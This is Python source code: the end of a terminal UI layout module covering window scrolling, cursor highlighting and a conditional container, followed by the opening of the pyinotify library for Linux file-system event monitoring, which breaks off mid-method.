new_screen.data_buffer[cpos.y][cpos.x] = \ _CHAR_CACHE[data, Token.PartialKeyBinding] def _highlight_cursorlines(self, cli, new_screen, cpos, x, y, width, height): """ Highlight cursor row/column. """ cursor_line_token = (':', ) + self.cursorline_token cursor_column_token = (':', ) + self.cursorcolumn_token data_buffer = new_screen.data_buffer # Highlight cursor line. if self.cursorline(cli): row = data_buffer[cpos.y] for x in range(x, x + width): original_char = row[x] row[x] = _CHAR_CACHE[ original_char.char, original_char.token + cursor_line_token] # Highlight cursor column. if self.cursorcolumn(cli): for y2 in range(y, y + height): row = data_buffer[y2] original_char = row[cpos.x] row[cpos.x] = _CHAR_CACHE[ original_char.char, original_char.token + cursor_column_token] # Highlight color columns for cc in self.get_colorcolumns(cli): assert isinstance(cc, ColorColumn) color_column_token = (':', ) + cc.token column = cc.position for y2 in range(y, y + height): row = data_buffer[y2] original_char = row[column] row[column] = _CHAR_CACHE[ original_char.char, original_char.token + color_column_token] def _copy_margin(self, cli, lazy_screen, new_screen, write_position, move_x, width): """ Copy characters from the margin screen to the real screen. 
""" xpos = write_position.xpos + move_x ypos = write_position.ypos margin_write_position = WritePosition(xpos, ypos, width, write_position.height) self._copy_body(cli, lazy_screen, new_screen, margin_write_position, 0, width) def _scroll_when_linewrapping(self, ui_content, width, height, cli): """ Scroll to make sure the cursor position is visible and that we maintain the requested scroll offset. Set `self.horizontal_scroll/vertical_scroll`. """ scroll_offsets_bottom = self.scroll_offsets.bottom scroll_offsets_top = self.scroll_offsets.top # We don't have horizontal scrolling. self.horizontal_scroll = 0 # If the current line consumes more than the whole window height, # then we have to scroll vertically inside this line. (We don't take # the scroll offsets into account for this.) # Also, ignore the scroll offsets in this case. Just set the vertical # scroll to this line. if ui_content.get_height_for_line(ui_content.cursor_position.y, width) > height - scroll_offsets_top: # Calculate the height of the text before the cursor, with the line # containing the cursor included, and the character belowe the # cursor included as well. line = explode_tokens(ui_content.get_line(ui_content.cursor_position.y)) text_before_cursor = token_list_to_text(line[:ui_content.cursor_position.x + 1]) text_before_height = UIContent.get_height_for_text(text_before_cursor, width) # Adjust scroll offset. self.vertical_scroll = ui_content.cursor_position.y self.vertical_scroll_2 = min(text_before_height - 1, self.vertical_scroll_2) self.vertical_scroll_2 = max(0, text_before_height - height, self.vertical_scroll_2) return else: self.vertical_scroll_2 = 0 # Current line doesn't consume the whole height. Take scroll offsets into account. def get_min_vertical_scroll(): # Make sure that the cursor line is not below the bottom. # (Calculate how many lines can be shown between the cursor and the .) used_height = 0 prev_lineno = ui_content.cursor_position.y for lineno in range(ui_content.cursor_position.y, -1, -1): used_height += ui_content.get_height_for_line(lineno, width) if used_height > height - scroll_offsets_bottom: return prev_lineno else: prev_lineno = lineno return 0 def get_max_vertical_scroll(): # Make sure that the cursor line is not above the top. prev_lineno = ui_content.cursor_position.y used_height = 0 for lineno in range(ui_content.cursor_position.y - 1, -1, -1): used_height += ui_content.get_height_for_line(lineno, width) if used_height > scroll_offsets_top: return prev_lineno else: prev_lineno = lineno return prev_lineno def get_topmost_visible(): """ Calculate the upper most line that can be visible, while the bottom is still visible. We should not allow scroll more than this if `allow_scroll_beyond_bottom` is false. """ prev_lineno = ui_content.line_count - 1 used_height = 0 for lineno in range(ui_content.line_count - 1, -1, -1): used_height += ui_content.get_height_for_line(lineno, width) if used_height > height: return prev_lineno else: prev_lineno = lineno return prev_lineno # Scroll vertically. (Make sure that the whole line which contains the # cursor is visible. topmost_visible = get_topmost_visible() # Note: the `min(topmost_visible, ...)` is to make sure that we # don't require scrolling up because of the bottom scroll offset, # when we are at the end of the document. self.vertical_scroll = max(self.vertical_scroll, min(topmost_visible, get_min_vertical_scroll())) self.vertical_scroll = min(self.vertical_scroll, get_max_vertical_scroll()) # Disallow scrolling beyond bottom? 
if not self.allow_scroll_beyond_bottom(cli): self.vertical_scroll = min(self.vertical_scroll, topmost_visible) def _scroll_without_linewrapping(self, ui_content, width, height, cli): """ Scroll to make sure the cursor position is visible and that we maintain the requested scroll offset. Set `self.horizontal_scroll/vertical_scroll`. """ cursor_position = ui_content.cursor_position or Point(0, 0) # Without line wrapping, we will never have to scroll vertically inside # a single line. self.vertical_scroll_2 = 0 if ui_content.line_count == 0: self.vertical_scroll = 0 self.horizontal_scroll = 0 return else: current_line_text = token_list_to_text(ui_content.get_line(cursor_position.y)) def do_scroll(current_scroll, scroll_offset_start, scroll_offset_end, cursor_pos, window_size, content_size): " Scrolling algorithm. Used for both horizontal and vertical scrolling. " # Calculate the scroll offset to apply. # This can obviously never be more than have the screen size. Also, when the # cursor appears at the top or bottom, we don't apply the offset. scroll_offset_start = int(min(scroll_offset_start, window_size / 2, cursor_pos)) scroll_offset_end = int(min(scroll_offset_end, window_size / 2, content_size - 1 - cursor_pos)) # Prevent negative scroll offsets. if current_scroll < 0: current_scroll = 0 # Scroll back if we scrolled to much and there's still space to show more of the document. if (not self.allow_scroll_beyond_bottom(cli) and current_scroll > content_size - window_size): current_scroll = max(0, content_size - window_size) # Scroll up if cursor is before visible part. if current_scroll > cursor_pos - scroll_offset_start: current_scroll = max(0, cursor_pos - scroll_offset_start) # Scroll down if cursor is after visible part. if current_scroll < (cursor_pos + 1) - window_size + scroll_offset_end: current_scroll = (cursor_pos + 1) - window_size + scroll_offset_end return current_scroll # When a preferred scroll is given, take that first into account. if self.get_vertical_scroll: self.vertical_scroll = self.get_vertical_scroll(self) assert isinstance(self.vertical_scroll, int) if self.get_horizontal_scroll: self.horizontal_scroll = self.get_horizontal_scroll(self) assert isinstance(self.horizontal_scroll, int) # Update horizontal/vertical scroll to make sure that the cursor # remains visible. offsets = self.scroll_offsets self.vertical_scroll = do_scroll( current_scroll=self.vertical_scroll, scroll_offset_start=offsets.top, scroll_offset_end=offsets.bottom, cursor_pos=ui_content.cursor_position.y, window_size=height, content_size=ui_content.line_count) self.horizontal_scroll = do_scroll( current_scroll=self.horizontal_scroll, scroll_offset_start=offsets.left, scroll_offset_end=offsets.right, cursor_pos=get_cwidth(current_line_text[:ui_content.cursor_position.x]), window_size=width, # We can only analyse the current line. Calculating the width off # all the lines is too expensive. content_size=max(get_cwidth(current_line_text), self.horizontal_scroll + width)) def _mouse_handler(self, cli, mouse_event): """ Mouse handler. Called when the UI control doesn't handle this particular event. """ if mouse_event.event_type == MouseEventType.SCROLL_DOWN: self._scroll_down(cli) elif mouse_event.event_type == MouseEventType.SCROLL_UP: self._scroll_up(cli) def _scroll_down(self, cli): " Scroll window down. 
" info = self.render_info if self.vertical_scroll < info.content_height - info.window_height: if info.cursor_position.y <= info.configured_scroll_offsets.top: self.content.move_cursor_down(cli) self.vertical_scroll += 1 def _scroll_up(self, cli): " Scroll window up. " info = self.render_info if info.vertical_scroll > 0: # TODO: not entirely correct yet in case of line wrapping and long lines. if info.cursor_position.y >= info.window_height - 1 - info.configured_scroll_offsets.bottom: self.content.move_cursor_up(cli) self.vertical_scroll -= 1 def walk(self, cli): # Only yield self. A window doesn't have children. yield self class ConditionalContainer(Container): """ Wrapper around any other container that can change the visibility. The received `filter` determines whether the given container should be displayed or not. :param content: :class:`.Container` instance. :param filter: :class:`~prompt_toolkit.filters.CLIFilter` instance. """ def __init__(self, content, filter): assert isinstance(content, Container) self.content = content self.filter = to_cli_filter(filter) def __repr__(self): return 'ConditionalContainer(%r, filter=%r)' % (self.content, self.filter) def reset(self): self.content.reset() def preferred_width(self, cli, max_available_width): if self.filter(cli): return self.content.preferred_width(cli, max_available_width) else: return LayoutDimension.exact(0) def preferred_height(self, cli, width, max_available_height): if self.filter(cli): return self.content.preferred_height(cli, width, max_available_height) else: return LayoutDimension.exact(0) def write_to_screen(self, cli, screen, mouse_handlers, write_position): if self.filter(cli): return self.content.write_to_screen(cli, screen, mouse_handlers, write_position) def walk(self, cli): return self.content.walk(cli) # Deprecated alias for 'Container'. Layout = Container
#!/usr/bin/env python # pyinotify.py - python interface to inotify # Copyright (c) 2010 Sebastien Martini <[email protected]> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. """ pyinotify @author: Sebastien Martini @license: MIT License @contact: [email protected] """ class PyinotifyError(Exception): """Indicates exceptions raised by a Pyinotify class.""" pass class UnsupportedPythonVersionError(PyinotifyError): """ Raised on unsupported Python versions. """ def __init__(self, version): """ @param version: Current Python version @type version: string """ PyinotifyError.__init__(self, ('Python %s is unsupported, requires ' 'at least Python 3.0') % version) class UnsupportedLibcVersionError(PyinotifyError): """ Raised when libc couldn't be loaded or when inotify functions werent provided. """ def __init__(self): err = 'libc does not provide required inotify support' PyinotifyError.__init__(self, err) # Check Python version import sys if sys.version < '3.0': raise UnsupportedPythonVersionError(sys.version) # Import directives import threading import os import select import struct import fcntl import errno import termios import array import logging import atexit from collections import deque from datetime import datetime, timedelta import time import fnmatch import re import ctypes import ctypes.util import asyncore import glob try: from functools import reduce except ImportError: pass # Will fail on Python 2.4 which has reduce() builtin anyway. __author__ = "[email protected] (Sebastien Martini)" __version__ = "0.9.0" # Compatibity mode: set to True to improve compatibility with # Pyinotify 0.7.1. Do not set this variable yourself, call the # function compatibility_mode() instead. COMPATIBILITY_MODE = False # Load libc LIBC = None def strerrno(): code = ctypes.get_errno() return '%s (%s)' % (os.strerror(code), errno.errorcode[code]) def load_libc(): global LIBC libc = None try: libc = ctypes.util.find_library('c') except OSError as err: pass # Will attemp to load it with None anyway. except IOError as err: pass LIBC = ctypes.CDLL(libc, use_errno=True) # Check that libc has needed functions inside. if (not hasattr(LIBC, 'inotify_init') or not hasattr(LIBC, 'inotify_add_watch') or not hasattr(LIBC, 'inotify_rm_watch')): raise UnsupportedLibcVersionError() load_libc() class PyinotifyLogger(logging.Logger): """ Pyinotify logger used for logging unicode strings. 
""" def makeRecord(self, name, level, fn, lno, msg, args, exc_info, func=None, extra=None): rv = UnicodeLogRecord(name, level, fn, lno, msg, args, exc_info, func) if extra is not None: for key in extra: if (key in ["message", "asctime"]) or (key in rv.__dict__): raise KeyError("Attempt to overwrite %r in LogRecord" % key) rv.__dict__[key] = extra[key] return rv # Logging def logger_init(): """Initialize logger instance.""" log = logging.getLogger("pyinotify") console_handler = logging.StreamHandler() console_handler.setFormatter( logging.Formatter("[%(asctime)s %(name)s %(levelname)s] %(message)s")) log.addHandler(console_handler) log.setLevel(20) return log log = logger_init() # inotify's variables class SysCtlINotify: """ Access (read, write) inotify's variables through sysctl. Usually it requires administrator rights to update them. Examples: - Read max_queued_events attribute: myvar = max_queued_events.value - Update max_queued_events attribute: max_queued_events.value = 42 """ inotify_attrs = {'max_user_instances': 1, 'max_user_watches': 2, 'max_queued_events': 3} def __init__(self, attrname): sino = ctypes.c_int * 3 self._attrname = attrname self._attr = sino(5, 20, SysCtlINotify.inotify_attrs[attrname]) def get_val(self): """ Gets attribute's value. @return: stored value. @rtype: int """ oldv = ctypes.c_int(0) size = ctypes.c_int(ctypes.sizeof(oldv)) LIBC.sysctl(self._attr, 3, ctypes.c_voidp(ctypes.addressof(oldv)), ctypes.addressof(size), None, 0) return oldv.value def set_val(self, nval): """ Sets new attribute's value. @param nval: replaces current value by nval. @type nval: int """ oldv = ctypes.c_int(0) sizeo = ctypes.c_int(ctypes.sizeof(oldv)) newv = ctypes.c_int(nval) sizen = ctypes.c_int(ctypes.sizeof(newv)) LIBC.sysctl(self._attr, 3, ctypes.c_voidp(ctypes.addressof(oldv)), ctypes.addressof(sizeo), ctypes.c_voidp(ctypes.addressof(newv)), ctypes.addressof(sizen)) value = property(get_val, set_val) def __repr__(self): return '<%s=%d>' % (self._attrname, self.get_val()) # Singleton instances # # read: myvar = max_queued_events.value # update: max_queued_events.value = 42 # for attrname in ('max_queued_events', 'max_user_instances', 'max_user_watches'): globals()[attrname] = SysCtlINotify(attrname) class EventsCodes: """ Set of codes corresponding to each kind of events. Some of these flags are used to communicate with inotify, whereas the others are sent to userspace by inotify notifying some events. @cvar IN_ACCESS: File was accessed. @type IN_ACCESS: int @cvar IN_MODIFY: File was modified. @type IN_MODIFY: int @cvar IN_ATTRIB: Metadata changed. @type IN_ATTRIB: int @cvar IN_CLOSE_WRITE: Writtable file was closed. @type IN_CLOSE_WRITE: int @cvar IN_CLOSE_NOWRITE: Unwrittable file closed. @type IN_CLOSE_NOWRITE: int @cvar IN_OPEN: File was opened. @type IN_OPEN: int @cvar IN_MOVED_FROM: File was moved from X. @type IN_MOVED_FROM: int @cvar IN_MOVED_TO: File was moved to Y. @type IN_MOVED_TO: int @cvar IN_CREATE: Subfile was created. @type IN_CREATE: int @cvar IN_DELETE: Subfile was deleted. @type IN_DELETE: int @cvar IN_DELETE_SELF: Self (watched item itself) was deleted. @type IN_DELETE_SELF: int @cvar IN_MOVE_SELF: Self (watched item itself) was moved. @type IN_MOVE_SELF: int @cvar IN_UNMOUNT: Backing fs was unmounted. @type IN_UNMOUNT: int @cvar IN_Q_OVERFLOW: Event queued overflowed. @type IN_Q_OVERFLOW: int @cvar IN_IGNORED: File was ignored. @type IN_IGNORED: int @cvar IN_ONLYDIR: only watch the path if it is a directory (new in kernel 2.6.15). 
@type IN_ONLYDIR: int @cvar IN_DONT_FOLLOW: don't follow a symlink (new in kernel 2.6.15). IN_ONLYDIR we can make sure that we don't watch the target of symlinks. @type IN_DONT_FOLLOW: int @cvar IN_MASK_ADD: add to the mask of an already existing watch (new in kernel 2.6.14). @type IN_MASK_ADD: int @cvar IN_ISDIR: Event occurred against dir. @type IN_ISDIR: int @cvar IN_ONESHOT: Only send event once. @type IN_ONESHOT: int @cvar ALL_EVENTS: Alias for considering all of the events. @type ALL_EVENTS: int """ # The idea here is 'configuration-as-code' - this way, we get our nice class # constants, but we also get nice human-friendly text mappings to do lookups # against as well, for free: FLAG_COLLECTIONS = {'OP_FLAGS': { 'IN_ACCESS' : 0x00000001, # File was accessed 'IN_MODIFY' : 0x00000002, # File was modified 'IN_ATTRIB' : 0x00000004, # Metadata changed 'IN_CLOSE_WRITE' : 0x00000008, # Writable file was closed 'IN_CLOSE_NOWRITE' : 0x00000010, # Unwritable file closed 'IN_OPEN' : 0x00000020, # File was opened 'IN_MOVED_FROM' : 0x00000040, # File was moved from X 'IN_MOVED_TO' : 0x00000080, # File was moved to Y 'IN_CREATE' : 0x00000100, # Subfile was created 'IN_DELETE' : 0x00000200, # Subfile was deleted 'IN_DELETE_SELF' : 0x00000400, # Self (watched item itself) # was deleted 'IN_MOVE_SELF' : 0x00000800, # Self (watched item itself) was moved }, 'EVENT_FLAGS': { 'IN_UNMOUNT' : 0x00002000, # Backing fs was unmounted 'IN_Q_OVERFLOW' : 0x00004000, # Event queued overflowed 'IN_IGNORED' : 0x00008000, # File was ignored }, 'SPECIAL_FLAGS': { 'IN_ONLYDIR' : 0x01000000, # only watch the path if it is a # directory 'IN_DONT_FOLLOW' : 0x02000000, # don't follow a symlink 'IN_MASK_ADD' : 0x20000000, # add to the mask of an already # existing watch 'IN_ISDIR' : 0x40000000, # event occurred against dir 'IN_ONESHOT' : 0x80000000, # only send event once }, } def maskname(mask): """ Returns the event name associated to mask. IN_ISDIR is appended to the result when appropriate. Note: only one event is returned, because only one event can be raised at a given time. @param mask: mask. @type mask: int @return: event name. @rtype: str """ ms = mask name = '%s' if mask & IN_ISDIR: ms = mask - IN_ISDIR name = '%s|IN_ISDIR' return name % EventsCodes.ALL_VALUES[ms] maskname = staticmethod(maskname) # So let's now turn the configuration into code EventsCodes.ALL_FLAGS = {} EventsCodes.ALL_VALUES = {} for flagc, valc in EventsCodes.FLAG_COLLECTIONS.items(): # Make the collections' members directly accessible through the # class dictionary setattr(EventsCodes, flagc, valc) # Collect all the flags under a common umbrella EventsCodes.ALL_FLAGS.update(valc) # Make the individual masks accessible as 'constants' at globals() scope # and masknames accessible by values. for name, val in valc.items(): globals()[name] = val EventsCodes.ALL_VALUES[val] = name # all 'normal' events ALL_EVENTS = reduce(lambda x, y: x | y, EventsCodes.OP_FLAGS.values()) EventsCodes.ALL_FLAGS['ALL_EVENTS'] = ALL_EVENTS EventsCodes.ALL_VALUES[ALL_EVENTS] = 'ALL_EVENTS' class _Event: """ Event structure, represent events raised by the system. This is the base class and should be subclassed. """ def __init__(self, dict_): """ Attach attributes (contained in dict_) to self. @param dict_: Set of attributes. @type dict_: dictionary """ for tpl in dict_.items(): setattr(self, *tpl) def __repr__(self): """ @return: Generic event string representation. 
@rtype: str """ s = '' for attr, value in sorted(self.__dict__.items(), key=lambda x: x[0]): if attr.startswith('_'): continue if attr == 'mask': value = hex(getattr(self, attr)) elif isinstance(value, str) and not value: value = "''" s += ' %s%s%s' % (output_format.field_name(attr), output_format.punctuation('='), output_format.field_value(value)) s = '%s%s%s %s' % (output_format.punctuation('<'), output_format.class_name(self.__class__.__name__), s, output_format.punctuation('>')) return s def __str__(self): return repr(self) class _RawEvent(_Event): """ Raw event, it contains only the informations provided by the system. It doesn't infer anything. """ def __init__(self, wd, mask, cookie, name): """ @param wd: Watch Descriptor. @type wd: int @param mask: Bitmask of events. @type mask: int @param cookie: Cookie. @type cookie: int @param name: Basename of the file or directory against which the event was raised in case where the watched directory is the parent directory. None if the event was raised on the watched item itself. @type name: string or None """ # Use this variable to cache the result of str(self), this object # is immutable. self._str = None # name: remove trailing '\0' d = {'wd': wd, 'mask': mask, 'cookie': cookie, 'name': name.rstrip('\0')} _Event.__init__(self, d) log.debug(str(self)) def __str__(self): if self._str is None: self._str = _Event.__str__(self) return self._str class Event(_Event): """ This class contains all the useful informations about the observed event. However, the presence of each field is not guaranteed and depends on the type of event. In effect, some fields are irrelevant for some kind of event (for example 'cookie' is meaningless for IN_CREATE whereas it is mandatory for IN_MOVE_TO). The possible fields are: - wd (int): Watch Descriptor. - mask (int): Mask. - maskname (str): Readable event name. - path (str): path of the file or directory being watched. - name (str): Basename of the file or directory against which the event was raised in case where the watched directory is the parent directory. None if the event was raised on the watched item itself. This field is always provided even if the string is ''. - pathname (str): Concatenation of 'path' and 'name'. - src_pathname (str): Only present for IN_MOVED_TO events and only in the case where IN_MOVED_FROM events are watched too. Holds the source pathname from where pathname was moved from. - cookie (int): Cookie. - dir (bool): True if the event was raised against a directory. """ def __init__(self, raw): """ Concretely, this is the raw event plus inferred infos. """ _Event.__init__(self, raw) self.maskname = EventsCodes.maskname(self.mask) if COMPATIBILITY_MODE: self.event_name = self.maskname try: if self.name: self.pathname = os.path.abspath(os.path.join(self.path, self.name)) else: self.pathname = os.path.abspath(self.path) except AttributeError as err: # Usually it is not an error some events are perfectly valids # despite the lack of these attributes. log.debug(err) class ProcessEventError(PyinotifyError): """ ProcessEventError Exception. Raised on ProcessEvent error. """ def __init__(self, err): """ @param err: Exception error description. @type err: string """ PyinotifyError.__init__(self, err) class _ProcessEvent: """ Abstract processing event class. """ def __call__(self, event): """ To behave like a functor the object must be callable. This method is a dispatch method. Its lookup order is: 1. process_MASKNAME method 2. process_FAMILY_NAME method 3. 
otherwise calls process_default @param event: Event to be processed. @type event: Event object @return: By convention when used from the ProcessEvent class: - Returning False or None (default value) means keep on executing next chained functors (see chain.py example). - Returning True instead means do not execute next processing functions. @rtype: bool @raise ProcessEventError: Event object undispatchable, unknown event. """ stripped_mask = event.mask - (event.mask & IN_ISDIR) maskname = EventsCodes.ALL_VALUES.get(stripped_mask) if maskname is None: raise ProcessEventError("Unknown mask 0x%08x" % stripped_mask) # 1- look for process_MASKNAME meth = getattr(self, 'process_' + maskname, None) if meth is not None: return meth(event) # 2- look for process_FAMILY_NAME meth = getattr(self, 'process_IN_' + maskname.split('_')[1], None) if meth is not None: return meth(event) # 3- default call method process_default return self.process_default(event) def __repr__(self): return '<%s>' % self.__class__.__name__ class _SysProcessEvent(_ProcessEvent): """ There is three kind of processing according to each event: 1. special handling (deletion from internal container, bug, ...). 2. default treatment: which is applied to the majority of events. 3. IN_ISDIR is never sent alone, he is piggybacked with a standard event, he is not processed as the others events, instead, its value is captured and appropriately aggregated to dst event. """ def __init__(self, wm, notifier): """ @param wm: Watch Manager. @type wm: WatchManager instance @param notifier: Notifier. @type notifier: Notifier instance """ self._watch_manager = wm # watch manager self._notifier = notifier # notifier self._mv_cookie = {} # {cookie(int): (src_path(str), date), ...} self._mv = {} # {src_path(str): (dst_path(str), date), ...} def cleanup(self): """ Cleanup (delete) old (>1mn) records contained in self._mv_cookie and self._mv. """ date_cur_ = datetime.now() for seq in (self._mv_cookie, self._mv): for k in list(seq.keys()): if (date_cur_ - seq[k][1]) > timedelta(minutes=1): log.debug('Cleanup: deleting entry %s', seq[k][0]) del seq[k] def process_IN_CREATE(self, raw_event): """ If the event affects a directory and the auto_add flag of the targetted watch is set to True, a new watch is added on this new directory, with the same attribute values than those of this watch. """ if raw_event.mask & IN_ISDIR: watch_ = self._watch_manager.get_watch(raw_event.wd) created_dir = os.path.join(watch_.path, raw_event.name) if watch_.auto_add and not watch_.exclude_filter(created_dir): addw = self._watch_manager.add_watch # The newly monitored directory inherits attributes from its # parent directory. addw_ret = addw(created_dir, watch_.mask, proc_fun=watch_.proc_fun, rec=False, auto_add=watch_.auto_add, exclude_filter=watch_.exclude_filter) # Trick to handle mkdir -p /t1/t2/t3 where t1 is watched and # t2 and t3 are created. # Since the directory is new, then everything inside it # must also be new. created_dir_wd = addw_ret.get(created_dir) if (created_dir_wd is not None) and created_dir_wd > 0: for name in os.listdir(created_dir): inner = os.path.join(created_dir, name) if (os.path.isdir(inner) and self._watch_manager.get_wd(inner) is None): # Generate (simulate) creation event for sub # directories. rawevent = _RawEvent(created_dir_wd, IN_CREATE | IN_ISDIR, 0, name) self._notifier.append_event(rawevent) return self.process_default(raw_event) def process_IN_MOVED_FROM(self, raw_event): """ Map the cookie with the source path (+ date for cleaning). 
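        For example (paths and values are illustrative only): after
        "mv /tmp/a /tmp/b" the kernel queues an IN_MOVED_FROM event for 'a'
        and an IN_MOVED_TO event for 'b' that share one cookie, so this method
        records roughly self._mv_cookie[cookie] = ('/tmp/a', datetime.now())
        for later pairing in process_IN_MOVED_TO.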
""" watch_ = self._watch_manager.get_watch(raw_event.wd) path_ = watch_.path src_path = os.path.normpath(os.path.join(path_, raw_event.name)) self._mv_cookie[raw_event.cookie] = (src_path, datetime.now()) return self.process_default(raw_event, {'cookie': raw_event.cookie}) def process_IN_MOVED_TO(self, raw_event): """ Map the source path with the destination path (+ date for cleaning). """ watch_ = self._watch_manager.get_watch(raw_event.wd) path_ = watch_.path dst_path = os.path.normpath(os.path.join(path_, raw_event.name)) mv_ = self._mv_cookie.get(raw_event.cookie) to_append = {'cookie': raw_event.cookie} if mv_ is not None: self._mv[mv_[0]] = (dst_path, datetime.now()) # Let's assume that IN_MOVED_FROM event is always queued before # that its associated (they share a common cookie) IN_MOVED_TO # event is queued itself. It is then possible in that scenario # to provide as additional information to the IN_MOVED_TO event # the original pathname of the moved file/directory. to_append['src_pathname'] = mv_[0] elif (raw_event.mask & IN_ISDIR and watch_.auto_add and not watch_.exclude_filter(dst_path)): # We got a diretory that's "moved in" from an unknown source and # auto_add is enabled. Manually add watches to the inner subtrees. # The newly monitored directory inherits attributes from its # parent directory. self._watch_manager.add_watch(dst_path, watch_.mask, proc_fun=watch_.proc_fun, rec=True, auto_add=True, exclude_filter=watch_.exclude_filter) return self.process_default(raw_event, to_append) def process_IN_MOVE_SELF(self, raw_event): """ STATUS: the following bug has been fixed in recent kernels (FIXME: which version ?). Now it raises IN_DELETE_SELF instead. Old kernels were bugged, this event raised when the watched item were moved, so we had to update its path, but under some circumstances it was impossible: if its parent directory and its destination directory wasn't watched. The kernel (see include/linux/fsnotify.h) doesn't bring us enough informations like the destination path of moved items. """ watch_ = self._watch_manager.get_watch(raw_event.wd) src_path = watch_.path mv_ = self._mv.get(src_path) if mv_: dest_path = mv_[0] watch_.path = dest_path # add the separator to the source path to avoid overlapping # path issue when testing with startswith() src_path += os.path.sep src_path_len = len(src_path) # The next loop renames all watches with src_path as base path. # It seems that IN_MOVE_SELF does not provide IN_ISDIR information # therefore the next loop is iterated even if raw_event is a file. for w in self._watch_manager.watches.values(): if w.path.startswith(src_path): # Note that dest_path is a normalized path. w.path = os.path.join(dest_path, w.path[src_path_len:]) else: log.error("The pathname '%s' of this watch %s has probably changed " "and couldn't be updated, so it cannot be trusted " "anymore. To fix this error move directories/files only " "between watched parents directories, in this case e.g. " "put a watch on '%s'.", watch_.path, watch_, os.path.normpath(os.path.join(watch_.path, os.path.pardir))) if not watch_.path.endswith('-unknown-path'): watch_.path += '-unknown-path' return self.process_default(raw_event) def process_IN_Q_OVERFLOW(self, raw_event): """ Only signal an overflow, most of the common flags are irrelevant for this event (path, wd, name). 
""" return Event({'mask': raw_event.mask}) def process_IN_IGNORED(self, raw_event): """ The watch descriptor raised by this event is now ignored (forever), it can be safely deleted from the watch manager dictionary. After this event we can be sure that neither the event queue nor the system will raise an event associated to this wd again. """ event_ = self.process_default(raw_event) self._watch_manager.del_watch(raw_event.wd) return event_ def process_default(self, raw_event, to_append=None): """ Commons handling for the followings events: IN_ACCESS, IN_MODIFY, IN_ATTRIB, IN_CLOSE_WRITE, IN_CLOSE_NOWRITE, IN_OPEN, IN_DELETE, IN_DELETE_SELF, IN_UNMOUNT. """ watch_ = self._watch_manager.get_watch(raw_event.wd) if raw_event.mask & (IN_DELETE_SELF | IN_MOVE_SELF): # Unfornulately this information is not provided by the kernel dir_ = watch_.dir else: dir_ = bool(raw_event.mask & IN_ISDIR) dict_ = {'wd': raw_event.wd, 'mask': raw_event.mask, 'path': watch_.path, 'name': raw_event.name, 'dir': dir_} if COMPATIBILITY_MODE: dict_['is_dir'] = dir_ if to_append is not None: dict_.update(to_append) return Event(dict_) class ProcessEvent(_ProcessEvent): """ Process events objects, can be specialized via subclassing, thus its behavior can be overriden: Note: you should not override __init__ in your subclass instead define a my_init() method, this method will be called automatically from the constructor of this class with its optionals parameters. 1. Provide specialized individual methods, e.g. process_IN_DELETE for processing a precise type of event (e.g. IN_DELETE in this case). 2. Or/and provide methods for processing events by 'family', e.g. process_IN_CLOSE method will process both IN_CLOSE_WRITE and IN_CLOSE_NOWRITE events (if process_IN_CLOSE_WRITE and process_IN_CLOSE_NOWRITE aren't defined though). 3. Or/and override process_default for catching and processing all the remaining types of events. """ pevent = None def __init__(self, pevent=None, **kargs): """ Enable chaining of ProcessEvent instances. @param pevent: Optional callable object, will be called on event processing (before self). @type pevent: callable @param kargs: This constructor is implemented as a template method delegating its optionals keyworded arguments to the method my_init(). @type kargs: dict """ self.pevent = pevent self.my_init(**kargs) def my_init(self, **kargs): """ This method is called from ProcessEvent.__init__(). This method is empty here and must be redefined to be useful. In effect, if you need to specifically initialize your subclass' instance then you just have to override this method in your subclass. Then all the keyworded arguments passed to ProcessEvent.__init__() will be transmitted as parameters to this method. Beware you MUST pass keyword arguments though. @param kargs: optional delegated arguments from __init__(). @type kargs: dict """ pass def __call__(self, event): stop_chaining = False if self.pevent is not None: # By default methods return None so we set as guideline # that methods asking for stop chaining must explicitely # return non None or non False values, otherwise the default # behavior will be to accept chain call to the corresponding # local method. stop_chaining = self.pevent(event) if not stop_chaining: return _ProcessEvent.__call__(self, event) def nested_pevent(self): return self.pevent def process_IN_Q_OVERFLOW(self, event): """ By default this method only reports warning messages, you can overredide it by subclassing ProcessEvent and implement your own process_IN_Q_OVERFLOW method. 
The actions you can take on receiving this event is either to update the variable max_queued_events in order to handle more simultaneous events or to modify your code in order to accomplish a better filtering diminishing the number of raised events. Because this method is defined, IN_Q_OVERFLOW will never get transmitted as arguments to process_default calls. @param event: IN_Q_OVERFLOW event. @type event: dict """ log.warning('Event queue overflowed.') def process_default(self, event): """ Default processing event method. By default does nothing. Subclass ProcessEvent and redefine this method in order to modify its behavior. @param event: Event to be processed. Can be of any type of events but IN_Q_OVERFLOW events (see method process_IN_Q_OVERFLOW). @type event: Event instance """ pass class PrintAllEvents(ProcessEvent): """ Dummy class used to print events strings representations. For instance this class is used from command line to print all received events to stdout. """ def my_init(self, out=None): """ @param out: Where events will be written. @type out: Object providing a valid file object interface. """ if out is None: out = sys.stdout self._out = out def process_default(self, event): """ Writes event string representation to file object provided to my_init(). @param event: Event to be processed. Can be of any type of events but IN_Q_OVERFLOW events (see method process_IN_Q_OVERFLOW). @type event: Event instance """ self._out.write(str(event)) self._out.write('\n') self._out.flush() class ChainIfTrue(ProcessEvent): """ Makes conditional chaining depending on the result of the nested processing instance. """ def my_init(self, func): """ Method automatically called from base class constructor. """ self._func = func def process_default(self, event): return not self._func(event) class Stats(ProcessEvent): """ Compute and display trivial statistics about processed events. """ def my_init(self): """ Method automatically called from base class constructor. """ self._start_time = time.time() self._stats = {} self._stats_lock = threading.Lock() def process_default(self, event): """ Processes |event|. """ self._stats_lock.acquire() try: events = event.maskname.split('|') for event_name in events: count = self._stats.get(event_name, 0) self._stats[event_name] = count + 1 finally: self._stats_lock.release() def _stats_copy(self): 